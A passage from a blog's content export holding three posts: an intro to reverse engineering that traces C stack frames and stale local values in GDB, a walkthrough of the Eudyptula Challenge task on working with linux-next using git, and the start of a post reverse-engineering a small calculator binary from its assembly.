isn\u0026rsquo;t it?. Let\u0026rsquo;s see the output of this program before jumping to conclusions.\nvar1 (0x7ffeaf266d1c) = 55 var2 (0x7ffeaf266d1c) = 55 Both values are equal Both var1 and var2 have same values and infact have same memory addresses\u0026hellip; even though they belong to different functions and have separate stack frame and everything.\nTo understand this we\u0026rsquo;ll have to go deeper with a debugger (I\u0026rsquo;m using GDB).\n\u0026gt;\u0026gt;\u0026gt; disas main Dump of assembler code for function main: // Prologue 0x00000000000011a6 \u0026lt;+0\u0026gt;:\tpush rbp 0x00000000000011a7 \u0026lt;+1\u0026gt;:\tmov rbp,rsp // Creating space in stack for variables. 0x10 is 16 bytes (4 bytes for each int variable) // 4(v1) + 4(v2) + 8 (padding) 0x00000000000011aa \u0026lt;+4\u0026gt;:\tsub rsp,0x10 // Function call and store value in [rbp-0x4] 0x00000000000011ae \u0026lt;+8\u0026gt;:\tmov eax,0x0 0x00000000000011b3 \u0026lt;+13\u0026gt;:\tcall 0x1174 \u0026lt;func1\u0026gt; 0x00000000000011b8 \u0026lt;+18\u0026gt;:\tmov DWORD PTR [rbp-0x4],eax // Another function call and store value in [rbp-0x8] 0x00000000000011bb \u0026lt;+21\u0026gt;:\tmov eax,0x0 0x00000000000011c0 \u0026lt;+26\u0026gt;:\tcall 0x1149 \u0026lt;func2\u0026gt; 0x00000000000011c5 \u0026lt;+31\u0026gt;:\tmov DWORD PTR [rbp-0x8],eax // Compare values stored in [rbp-0x4] \u0026amp; [rbp-0x8] 0x00000000000011c8 \u0026lt;+34\u0026gt;:\tmov eax,DWORD PTR [rbp-0x4] 0x00000000000011cb \u0026lt;+37\u0026gt;:\tcmp eax,DWORD PTR [rbp-0x8] // if not equal then jump to \u0026lt;main+59\u0026gt; 0x00000000000011ce \u0026lt;+40\u0026gt;:\tjne 0x11e1 \u0026lt;main+59\u0026gt; // else print this message 0x00000000000011d0 \u0026lt;+42\u0026gt;:\tlea rax,[rip+0xe4d] # 0x2024 0x00000000000011d7 \u0026lt;+49\u0026gt;:\tmov rdi,rax 0x00000000000011da \u0026lt;+52\u0026gt;:\tcall 0x1030 \u0026lt;puts@plt\u0026gt; // And finally jump to \u0026lt;main+74\u0026gt; (epilogue) 0x00000000000011df \u0026lt;+57\u0026gt;:\tjmp 0x11f0 \u0026lt;main+74\u0026gt; // if comparision failed: land here and print this message 0x00000000000011e1 \u0026lt;+59\u0026gt;:\tlea rax,[rip+0xe52] # 0x203a 0x00000000000011e8 \u0026lt;+66\u0026gt;:\tmov rdi,rax 0x00000000000011eb \u0026lt;+69\u0026gt;:\tcall 0x1030 \u0026lt;puts@plt\u0026gt; // Finally epilogue - set return value and leave 0x00000000000011f0 \u0026lt;+74\u0026gt;:\tmov eax,0xa 0x00000000000011f5 \u0026lt;+79\u0026gt;:\tleave 0x00000000000011f6 \u0026lt;+80\u0026gt;:\tret End of assembler dump. In the disassembly code, the main function calls both the functions and stores their respective return values in [rbp-0x4] and [rbp-0x8] memory locations. Since these variables are specific to main function, they will be created in the stack memory (inside the stack frame for main function).\n\u0026gt;\u0026gt;\u0026gt; disas func1 Dump of assembler code for function func1: // Prologue 0x0000000000001174 \u0026lt;+0\u0026gt;:\tpush rbp 0x0000000000001175 \u0026lt;+1\u0026gt;:\tmov rbp,rsp // Create memory for the variable -- 4(var1) + 12(padding) = 16 (0x10) 0x0000000000001178 \u0026lt;+4\u0026gt;:\tsub rsp,0x10 // Store 0x37(55) in [rbp-0x4] 0x000000000000117c \u0026lt;+8\u0026gt;:\tmov DWORD PTR [rbp-0x4],0x37 // Print this value with a specific message 0x0000000000001183 \u0026lt;+15\u0026gt;:\tmov edx,DWORD PTR [rbp-0x4] 0x0000000000001186 \u0026lt;+18\u0026gt;:\tlea rax,[rbp-0x4] 0x000000000000118a \u0026lt;+22\u0026gt;:\tmov rsi,rax 0x000000000000118d \u0026lt;+25\u0026gt;:\tlea rax,[rip+0xe80] # 0x2014 0x0000000000001194 \u0026lt;+32\u0026gt;:\tmov rdi,rax 0x0000000000001197 \u0026lt;+35\u0026gt;:\tmov eax,0x0 0x000000000000119c \u0026lt;+40\u0026gt;:\tcall 0x1040 \u0026lt;printf@plt\u0026gt; // Epilogue: set this value as return value and leave 0x00000000000011a1 \u0026lt;+45\u0026gt;:\tmov eax,DWORD PTR [rbp-0x4] 0x00000000000011a4 \u0026lt;+48\u0026gt;:\tleave 0x00000000000011a5 \u0026lt;+49\u0026gt;:\tret End of assembler dump. The above function, when called, will create another stack frame just after the main function\u0026rsquo;s stack frame\u0026hellip; and will create it\u0026rsquo;s local variables in that region.\nThis function will print the value of the local variable and then return back to the main function. This action will remove the stack frame created by resetting the stack pointer and base pointer register values\u0026hellip; BUT the actual values stored in memory location is still not overwritten by anything. So technically, the values are still present there and can be accessed if the memory location can be pointed to.\n\u0026gt;\u0026gt;\u0026gt; disas func2 Dump of assembler code for function func2: // Prologue 0x0000000000001149 \u0026lt;+0\u0026gt;:\tpush rbp 0x000000000000114a \u0026lt;+1\u0026gt;:\tmov rbp,rsp // Create memory for the variable -- 4(var2) + 12(padding) = 16 (0x10) 0x000000000000114d \u0026lt;+4\u0026gt;:\tsub rsp,0x10 // Print the value with a specific message 0x0000000000001151 \u0026lt;+8\u0026gt;:\tmov edx,DWORD PTR [rbp-0x4] 0x0000000000001154 \u0026lt;+11\u0026gt;:\tlea rax,[rbp-0x4] 0x0000000000001158 \u0026lt;+15\u0026gt;:\tmov rsi,rax 0x000000000000115b \u0026lt;+18\u0026gt;:\tlea rax,[rip+0xea2] # 0x2004 0x0000000000001162 \u0026lt;+25\u0026gt;:\tmov rdi,rax 0x0000000000001165 \u0026lt;+28\u0026gt;:\tmov eax,0x0 0x000000000000116a \u0026lt;+33\u0026gt;:\tcall 0x1040 \u0026lt;printf@plt\u0026gt; // Epilogue: set this value as return value and leave 0x000000000000116f \u0026lt;+38\u0026gt;:\tmov eax,DWORD PTR [rbp-0x4] 0x0000000000001172 \u0026lt;+41\u0026gt;:\tleave 0x0000000000001173 \u0026lt;+42\u0026gt;:\tret End of assembler dump. After the func1 has returned, it\u0026rsquo;s time for func2 to create it\u0026rsquo;s own stack frame and it\u0026rsquo;s own local variables.\nCoincidently, the memory location used by func2 is exactly the same location that was used by func1 earlier. And on top of that, both functions have int type variables which means that the memory location used by var1 in func1 will be used by var2 in func2.\nStack frame for both functions will kind of overlap each other. That should explain why we we\u0026rsquo;re getting the same results and same memory locations in the program output earlier.\nThis theory should be enough to understand what\u0026rsquo;s going on\u0026hellip;. But practical is more fun. Accept it!!\nI\u0026rsquo;m going to place some breakpoints in the code and check the status of the stack on each hit. For me, such interesting points are where new variables or function\u0026rsquo;s stack frame will be created. This will help me to analyze the change in stack as we go forward.\n(NOTE: Sometimes I over-use breakpoints. Don\u0026rsquo;t judge me :| )\n\u0026gt;\u0026gt;\u0026gt; info break Num Type Disp Enb Address What // 0x5555555551a6 \u0026lt;main+0\u0026gt;:\tpush rbp 1 breakpoint keep y 0x00005555555551a6 in main at func_calls.c:16 // 0x5555555551aa \u0026lt;main+4\u0026gt;:\tsub rsp,0x10 2 breakpoint keep y 0x00005555555551aa in main at func_calls.c:16 // 0x5555555551b3 \u0026lt;main+13\u0026gt;:\tcall 0x555555555174 \u0026lt;func1\u0026gt; 3 breakpoint keep y 0x00005555555551b3 in main at func_calls.c:17 // 0x5555555551c0 \u0026lt;main+26\u0026gt;:\tcall 0x555555555149 \u0026lt;func2\u0026gt; 4 breakpoint keep y 0x00005555555551c0 in main at func_calls.c:18 // 0x5555555551f5 \u0026lt;main+79\u0026gt;:\tleave 5 breakpoint keep y 0x00005555555551f5 in main at func_calls.c:26 // 0x555555555174 \u0026lt;func1\u0026gt;:\tpush rbp 6 breakpoint keep y 0x0000555555555174 in func1 at func_calls.c:9 // 0x555555555178 \u0026lt;func1+4\u0026gt;:\tsub rsp,0x10 7 breakpoint keep y 0x0000555555555178 in func1 at func_calls.c:9 // 0x5555555551a5 \u0026lt;func1+49\u0026gt;:\tret 8 breakpoint keep y 0x00005555555551a5 in func1 at func_calls.c:13 // 0x555555555149 \u0026lt;func2\u0026gt;:\tpush rbp 9 breakpoint keep y 0x0000555555555149 in func2 at func_calls.c:3 // 0x55555555514d \u0026lt;func2+4\u0026gt;:\tsub rsp,0x10 10 breakpoint keep y 0x000055555555514d in func2 at func_calls.c:3 // 0x555555555173 \u0026lt;func2+42\u0026gt;:\tret 11 breakpoint keep y 0x0000555555555173 in func2 at func_calls.c:7 I\u0026rsquo;ve set up 11 break points here which will help me check the change in stack during the execution of the program.\nAfter running the program in debugger, it\u0026rsquo;ll stop at the first break point which is just before the point where main function\u0026rsquo;s stack frame will begin.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe218:\t0x00007ffff7de0790\t0x00007fffffffe310 0x7fffffffe228:\t0x00005555555551a6\t0x0000000155554040 0x7fffffffe238:\t0x00007fffffffe328\t0x00007fffffffe328 0x7fffffffe248:\t0x86b5da47f7ba01f3\t0x0000000000000000 0x7fffffffe258:\t0x00007fffffffe338\t0x0000555555557dd8 Theoretically, we know if we step over another instruction, value from rbp will be stored in the stack. So let\u0026rsquo;s check the value of rbp right now and then monitor the stack (after stepping over) to see if it is the same value we are expecting it to be.\n// Check the base pointer before stepping over instruction \u0026gt;\u0026gt;\u0026gt; p $rbp $1 = (void *) 0x1 // Check the next instruction to be executed \u0026gt;\u0026gt;\u0026gt; x $rip =\u0026gt; 0x5555555551a6 \u0026lt;main\u0026gt;:\tpush rbp // Step over an instruction \u0026gt;\u0026gt;\u0026gt; ni // Monitor stack \u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x8f2aa2d53bd1951c 0x7fffffffe250:\t0x0000000000000000\t0x00007fffffffe338 Now our stack has a new item in it, that is rbp value. If you notice, previously the top of the stack was at 0x7fffffffe218, but after adding one item the top of stack is 0x7fffffffe210. It decreased, which indicates that stack grows downwards; towards lower memory addresses.\nThe stack does not change up until the breakpoint 2 on 0x5555555551aa \u0026lt;main+4\u0026gt;:\tsub rsp,0x10\u0026hellip; But on stepping another instruction, we can see a new space of 16 bytes in the stack.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x8f2aa2d53bd1951c Before this, the stack pointer was on 0x7fffffffe210, now the stack pointer is on 0x7fffffffe200\u0026hellip; so 0x7fffffffe210 - 0x7fffffffe200 = 0x10 (16). Simple maths!!\nWe just moved the stack pointer down to create space required, no cleaning was done\u0026hellip; hence the stack is already filled with some garbage value that resided in the memory long before the stack occupied this new memory region.\nNow let\u0026rsquo;s call the function func1 and see what that function call will add to the stack.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f8:\t0x00005555555551b8\t0x0000000000000000 0x7fffffffe208:\t0x00007ffff7ffdab0\t0x0000000000000001 0x7fffffffe218:\t0x00007ffff7de0790\t0x00007fffffffe310 0x7fffffffe228:\t0x00005555555551a6\t0x0000000155554040 0x7fffffffe238:\t0x00007fffffffe328\t0x00007fffffffe328 Just after making the function call and before executing the first instruction of the func1, we have a new value in the stack. This new value is the return address for the main function, which will be used to continue execution after the func1 call is finished.\n\u0026gt;\u0026gt;\u0026gt; x/i 0x00005555555551b8 0x5555555551b8 \u0026lt;main+18\u0026gt;:\tmov DWORD PTR [rbp-0x4],eax (Note: if this value is somehow overwritten, we can make our function to return to another function or instruction. This is something which comes under a technique called Return Oriented Programming aka ROP.)\nAfter the first instruction of the func1 function, that is pushing the rbp on the stack, we can see an updated stack.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551b8 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 This points to the place where the main function\u0026rsquo;s base pointer is. Think this as a chain like connection which links to the next stop.\nNow after creating some space in this new stack frame for var1\u0026hellip;. Stack looks like this. (Notice that the stack keeps on growing down, towards low memory regions.)\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1e0:\t0x0000000000000000\t0x0000000000000000 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551b8 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 The leave instruction does a lot of the work. It copies the rbp to rsp and then restores the old rbp from the stack again.\nThis will move the base pointer back to 0x00007fffffffe210 and the stack pointer to 0x00007fffffffe1f8.\nThis instruction basically releases a stack frame set up by a function. That means now our new stack will look something like this.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f8:\t0x00005555555551b8\t0x0000000000000000 0x7fffffffe208:\t0x00007ffff7ffdab0\t0x0000000000000001 0x7fffffffe218:\t0x00007ffff7de0790\t0x00007fffffffe310 0x7fffffffe228:\t0x00005555555551a6\t0x0000000155554040 0x7fffffffe238:\t0x00007fffffffe328\t0x00007fffffffe328 The next ret statement will take off the top of the value from stack and move the instruction control to that memory location\u0026hellip; that is, set the rip value to that memory location. This means that the next instruction to be executed will be \u0026lt;main+18\u0026gt; which stores the eax (return value from the previous function call) into [rbp-0x4] location on stack.\n\u0026gt;\u0026gt;\u0026gt; x/i 0x00005555555551b8 =\u0026gt; 0x5555555551b8 \u0026lt;main+18\u0026gt;:\tmov DWORD PTR [rbp-0x4],eax So when func1 returns back, our stack looks something like this.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe200:\t0x0000000000000000\t0x00007ffff7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x42033bae0bc1441d Now for the next function func2, our stack is like this, just before the sub rsp,0x10 instruction. This instruction will create enough memory for the variables to be.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551c5 0x7fffffffe200:\t0x0000000000000000\t0x00000037f7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 Once the space in stack memory is created, the stack looks like this\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe1e0:\t0x0000000000000000\t0x0000003700000000 0x7fffffffe1f0:\t0x00007fffffffe210\t0x00005555555551c5 0x7fffffffe200:\t0x0000000000000000\t0x00000037f7ffdab0 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 If you notice, these are the same memory locations which were used by func1 to store 0x37 (mov DWORD PTR [rbp-0x4],0x37)\u0026hellip;. and since the stack is not cleaned properly, the value from that function is still in the place it was left to be picked by our variable var2.\nThis can be checked with x/w ($rbp-0x4)\n\u0026gt;\u0026gt;\u0026gt; x/w ($rbp-0x4) 0x7fffffffe1ec:\t0x00000037 So the value is just as it was left by func1\u0026hellip; :|\nNow after returning back to main function, the stack looks like this.\n\u0026gt;\u0026gt;\u0026gt; x/10xg $rsp 0x7fffffffe200:\t0x0000000000000000\t0x0000003700000037 0x7fffffffe210:\t0x0000000000000001\t0x00007ffff7de0790 0x7fffffffe220:\t0x00007fffffffe310\t0x00005555555551a6 0x7fffffffe230:\t0x0000000155554040\t0x00007fffffffe328 0x7fffffffe240:\t0x00007fffffffe328\t0x42033bae0bc1441d And both v1 and v2, are same values and were picked from the same memory locations when in their respective function frames.\n\u0026gt;\u0026gt;\u0026gt; x/w $rbp-0x4 0x7fffffffe20c:\t0x00000037 \u0026gt;\u0026gt;\u0026gt; x/w $rbp-0x8 0x7fffffffe208:\t0x00000037 This explains the somewhat unusual behaviour of the program. There is nothing special about this, its just the way the stack memory works and a well crafted example presented to you.\nIn next article, I\u0026rsquo;ll try to cover stack overflows\u0026hellip; which is a cool technique to insert the data in a variable which will overflow and overwrite the data for another variable. Try to think around this, if you may.\n","permalink":"https://ayedaemon.github.io/post/2023/05/intro-to-re-part-4/","summary":"When an operating system (OS) runs a program, the program is first loaded into main memory. Memory is utilized for both program\u0026rsquo;s machine instructions and program\u0026rsquo;s data\u0026hellip;this includes parameters, dynamic variables, (un)initialized variables, and so on.\nMost computers today use paged memory allocations, which allow the amount of memory assigned to a program to increase/decrease as the needs of the application change. Memory is allocated to the program and reclaimed by the operating system in fixed-size chunks known as pages.","title":"Intro to RE: C : part-4"},{"content":"This is Task 07 of the Eudyptula Challenge ------------------------------------------ Great work with that misc device driver. Isn\u0026#39;t that a nice and simple way to write a character driver? Just when you think this challenge is all about writing kernel code, this task is a throwback to your second one. Yes, that\u0026#39;s right, building kernels. Turns out that\u0026#39;s what most developers end up doing, tons and tons of rebuilds, not writing new code. Sad, but it is a good skill to know. The tasks this round are: - Download the linux-next kernel for today. Or tomorrow, just use the latest one. It changes every day so there is no specific one you need to pick. Build it. Boot it. Provide proof that you built and booted it. What is the linux-next kernel? Ah, that\u0026#39;s part of the challenge. For a hint, you should read the excellent documentation about how the Linux kernel is developed in Documentation/development-process/ in the kernel source itself. It\u0026#39;s a great read, and should tell you all you never wanted to know about what Linux kernel developers do and how they do it. What is Linux?? Before jumping on Linux-next\u0026hellip;let\u0026rsquo;s start with an overview of the Linux kernel and its significance within the Linux operating system.\nLinux is an open-source operating system kernel that was initially developed by Linus Torvalds in 1991. The kernel serves as the core component of the Linux operating system, providing essential functionalities and acting as an intermediary between the hardware and the software layers.\nThe Linux kernel plays a crucial role in managing system resources, handling hardware devices, and providing a foundation for software applications to run efficiently. Some of its key responsibilities include process management, memory management, device driver handling, file system management, and networking.\nOne of the defining characteristics of Linux is its open-source nature. This means that the source code of the kernel is freely available to the public, allowing individuals and communities to examine, modify, and distribute it according to their needs. This openness has fostered a vibrant ecosystem of developers who collaborate to improve and enhance the kernel\u0026rsquo;s capabilities.\nLinux is renowned for its stability, security, and scalability. Its robust design and efficient resource management make it suitable for a wide range of computing devices, from small embedded systems and smartphones to large-scale servers and supercomputers. Moreover, Linux serves as the foundation for numerous Linux distributions, which are complete operating systems that package the Linux kernel with additional software and user-friendly interfaces.\nBy harnessing the power of open-source collaboration, Linux has grown into a highly versatile and widely adopted operating system, powering various domains such as enterprise computing, cloud infrastructure, scientific research, mobile devices, and more. Its flexibility, reliability, and vast community support make it an attractive choice for individuals, businesses, and organizations seeking a powerful and customizable operating system.\nNow that we have a basic understanding of Linux and its kernel, we can delve into the concept of Linux-next and its significance within the development process.\nBig picture of linux development The development of the Linux kernel in the open-source world is a remarkable (somewhat scary for me) and dynamic process that involves collaboration among thousands of developers worldwide. Here\u0026rsquo;s a big picture overview of the Linux kernel development process:\nCollaboration and Community: The Linux kernel development thrives on collaboration and community engagement. It is led by Linus Torvalds, the original creator of Linux, along with a core group of maintainers who oversee different subsystems of the kernel. The development process follows a meritocratic model where contributions are reviewed and integrated based on their technical merits.\nPatch Submission: Developers from diverse backgrounds and organizations contribute to the Linux kernel. They propose changes, enhancements, bug fixes, and new features in the form of patches. These patches are submitted to the relevant subsystem maintainers or mailing lists for review.\nReview and Feedback: The submitted patches undergo a thorough review process, where experienced developers provide feedback, suggestions, and technical guidance. The review process ensures that the proposed changes align with the kernel\u0026rsquo;s standards, maintain compatibility, and adhere to best practices.\nIterative Development: Developers iterate on their patches based on the feedback received during the review process. They make necessary modifications, address concerns, and refine their code to meet the kernel\u0026rsquo;s quality standards.\nTesting and Integration: Once the patches are considered ready, they are tested extensively. Various testing frameworks, such as the Linux Test Project (LTP) and KernelCI, are used to ensure that the changes do not introduce regressions and maintain stability. The patches are then integrated into the \u0026ldquo;mainline\u0026rdquo; development branch.\nMainline Integration: The mainline development branch is where the accepted patches are merged into the official Linux kernel source code. Linus Torvalds oversees this process and has the final authority to accept or reject patches based on technical considerations. The mainline branch represents the most up-to-date version of the Linux kernel and serves as the basis for future releases.\nStable Releases and Long-Term Support: The Linux kernel follows a time-based release model, with new stable versions being released approximately every two to three months. These releases incorporate the accumulated changes from the mainline branch, undergo further testing, and receive bug fixes. Additionally, long-term support (LTS) versions are maintained for an extended period to ensure stability and compatibility for enterprise and embedded systems.\nEcosystem and Distribution: The Linux kernel forms the foundation for numerous Linux distributions. These distributions package the kernel with additional software, libraries, and user interfaces to create complete operating systems suitable for various use cases. The distributions play a crucial role in making Linux accessible to a wide range of users, providing installation, customization, and support options.\nThe Linux kernel development follows a patch cycle that involves several release candidate (RC) versions before a stable release is made. Here\u0026rsquo;s an overview of the Linux patch cycle and RC versions:\nDevelopment Cycle: The development cycle begins after a stable release is made. During this cycle, new features, enhancements, bug fixes, and improvements are introduced into the Linux kernel.\nPatch Submission: Developers submit patches for review and inclusion in the next kernel release. These patches can come from individual contributors, companies, or organizations.\nMainline Integration: The submitted patches go through a review process, where they are examined for technical correctness, adherence to coding standards, and compatibility with existing code. Accepted patches are integrated into the mainline development branch of the Linux kernel.\nMerge Window: The merge window is a specific period at the beginning of the development cycle when major changes and new features are merged into the mainline development branch. During this time, the Linux kernel developers are more open to accepting substantial modifications.\nRelease Candidates (RC): After the merge window closes, the Linux kernel development enters the release candidate phase. Release candidates are pre-release versions of the kernel that undergo testing and further refinement before the final stable release. Each release candidate is identified by the tag -rc\u0026lt;number\u0026gt;.\nRC1: The first release candidate marks the beginning of the testing phase for the upcoming release. It includes the merged changes from the merge window. RC2, RC3, and so on: Successive release candidates incorporate additional bug fixes, improvements, and patches that are considered stable enough to be tested. Testing and Bug Fixing: During the release candidate phase, extensive testing is performed by developers, testers, and the wider community. Any bugs, regressions, or issues discovered during this testing period are addressed and fixed in subsequent release candidates.\nStable Release: Once the release candidates have undergone sufficient testing and the kernel is deemed stable, the final stable release is made. The stable release incorporates all the accepted changes and bug fixes from the release candidates.\nLong-Term Support (LTS) Releases: In addition to the regular stable releases, certain versions of the Linux kernel are designated as Long-Term Support (LTS) releases. These LTS versions receive extended maintenance and bug fix support for a specified period to ensure stability and compatibility for enterprise and embedded systems.\nHere is how the 5.4 development cycle went:\nDate Release September 15, 2019 5.3 stable release September 30, 2019 5.4-rc1, merge window closes October 6, 2019 5.4-rc2 October 13, 2019 5.4-rc3 October 20, 2019 5.4-rc4 October 27, 2019 5.4-rc5 November 3, 2019 5.4-rc6 November 10, 2019 5.4-rc7 November 17, 2019 5.4-rc8 November 24, 2019 5.4 stable release Table taken from kernel.org/doc\nNext trees \u0026ldquo;Linux Next\u0026rdquo; refers to a specific development branch of the Linux kernel. The Linux Next branch serves as a staging area for upcoming changes and new features that are planned for inclusion in future versions of the Linux kernel. It acts as a testing ground where patches from different developers and subsystems are integrated and tested together.\nThe purpose of the Linux Next branch is to catch any potential conflicts or issues that may arise when combining different changes before they are merged into the mainline Linux kernel. By testing these changes in advance, it helps ensure the overall stability and quality of the Linux kernel.\nThe Linux Next branch is maintained by the Linux Next project, which is led by Stephen Rothwell and is supported by several Linux kernel developers. It provides a convenient way for developers to collaborate, test, and integrate their changes before they are submitted for inclusion in the mainline kernel.\nThere is a great Youtube video 1 where Greg Kroah-Hartman explains the whole development workflow. A MUST WATCH!!\nWorking with linux-next Now that we understand how the Linux development process works, we can see where the -next trees fall into the overall process. Let\u0026rsquo;s look at how these trees can be used to contribute to kernel development.\nInitial setup Clone the linux tree git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git Add a linux-next remote. cd linux git remote add linux-next https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git Fetch the changes and tags from linux-next. git fetch linux-next git fetch --tags linux-next Regular tracking Linux -next trees are built every day\u0026hellip; so you need to update it everyday before your work to make sure that you are not working on an older code base.\ngit checkout master git remote update Check newer tags git tag -l \u0026#34;next-*\u0026#34; | tail Checkout a new branch from the branch you want to work git checkout -b my_local_branch next-20230427 Now the next steps are very simple and straight-forward.\nMake changes to the code base. Test it with ./scripts/checkpatch.pl script for any issues which you need to solve before submitting it as a patch. Check git status and git diff before making a commit. Make a patch using git format-patch command. Now you have a well tested and formatted patch, all you need to do is find the maintainer using ./scripts/get_maintainer.pl script and then send the patch to all those people using git send-mail. Note: All of the above-discussed tools and techniques are completely optional; this is just what I would do.\nResources Linux development subscription lists (mails) All linux trees (git) Linux-next man page Linux kernel development process (official doc) Youtube: Linux Kernel Development, Greg Kroah-Hartman - Git Merge 2016 https://www.youtube.com/watch?v=vyenmLqJQjs\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/05/eudyptula-task-7/","summary":"This is Task 07 of the Eudyptula Challenge ------------------------------------------ Great work with that misc device driver. Isn\u0026#39;t that a nice and simple way to write a character driver? Just when you think this challenge is all about writing kernel code, this task is a throwback to your second one. Yes, that\u0026#39;s right, building kernels. Turns out that\u0026#39;s what most developers end up doing, tons and tons of rebuilds, not writing new code.","title":"Eudyptula Task 7"},{"content":"We covered a wide range of topics in earlier articles that were helpful in comprehending how many lower-level processes operate. This blog will concentrate on applying those ideas to recreate C program after reverse engineering a simple calculator binary.\nIt is always a good idea to observe how the target software responds to various inputs. This gives you a sense of the internal logic that might be operating.\nIf we run this program without any arguments, we will get an error message stating that we need to pass more arguments as well as the usage guide is printed.\n❯ ./calc Not enough arguments passed Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt; So I can assume that there are checks in place which will see if we\u0026rsquo;ve passed enough arguments. If not, it\u0026rsquo;ll exit with the above message.\nSo its obvious for anybody now to try it with the arguments this time.\n❯ ./calc 5 + 3 5 + 3 = 8 ❯ ./calc 100 / 5 100 / 5 = 20 This works now and gives us the required output in a good looking way. That should do it for now.\nIt\u0026rsquo;s time to open up our hacker tools and disassemble the binary.\nDisassembly:-\naddFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov edx, DWORD PTR [rbp-4] mov eax, DWORD PTR [rbp-8] add eax, edx pop rbp ret subFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov eax, DWORD PTR [rbp-4] sub eax, DWORD PTR [rbp-8] pop rbp ret mulFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov eax, DWORD PTR [rbp-4] imul eax, DWORD PTR [rbp-8] pop rbp ret divFunc: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov eax, DWORD PTR [rbp-4] cdq idiv DWORD PTR [rbp-8] pop rbp ret .LC0: .string \u0026#34;Not enough arguments passed\u0026#34; .LC1: .string \u0026#34;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\u0026#34; die: push rbp mov rbp, rsp mov edi, OFFSET FLAT:.LC0 call puts mov edi, OFFSET FLAT:.LC1 call puts mov edi, 1 call exit .LC2: .string \u0026#34;%d %c %d = %d\\n\u0026#34; main: push rbp mov rbp, rsp sub rsp, 48 mov DWORD PTR [rbp-36], edi mov QWORD PTR [rbp-48], rsi cmp DWORD PTR [rbp-36], 3 jg .L11 mov eax, 0 call die .L11: mov rax, QWORD PTR [rbp-48] add rax, 8 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-12], eax mov rax, QWORD PTR [rbp-48] add rax, 24 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-16], eax mov rax, QWORD PTR [rbp-48] add rax, 16 mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] mov BYTE PTR [rbp-17], al movsx eax, BYTE PTR [rbp-17] cmp eax, 47 je .L12 cmp eax, 47 jg .L13 cmp eax, 45 je .L14 cmp eax, 45 jg .L13 cmp eax, 42 je .L15 cmp eax, 43 jne .L13 mov QWORD PTR [rbp-8], OFFSET FLAT:addFunc jmp .L13 .L14: mov QWORD PTR [rbp-8], OFFSET FLAT:subFunc jmp .L13 .L15: mov QWORD PTR [rbp-8], OFFSET FLAT:mulFunc jmp .L13 .L12: mov QWORD PTR [rbp-8], OFFSET FLAT:divFunc nop .L13: mov edx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov rcx, QWORD PTR [rbp-8] mov esi, edx mov edi, eax call rcx mov esi, eax movsx edx, BYTE PTR [rbp-17] mov ecx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov r8d, esi mov esi, eax mov edi, OFFSET FLAT:.LC2 mov eax, 0 call printf nop leave ret This is far too large to handle at once. So I\u0026rsquo;ll start with smaller functions and see what they do before moving on to the main function.\n(In my opinion, there is no specific reverse engineering flow. You could start from anywhere that suits your needs and the project at hand.)\nNow the first function I\u0026rsquo;ll start with is going to be the addFunc.\naddFunc: push rbp mov rbp, rsp mov DWORD 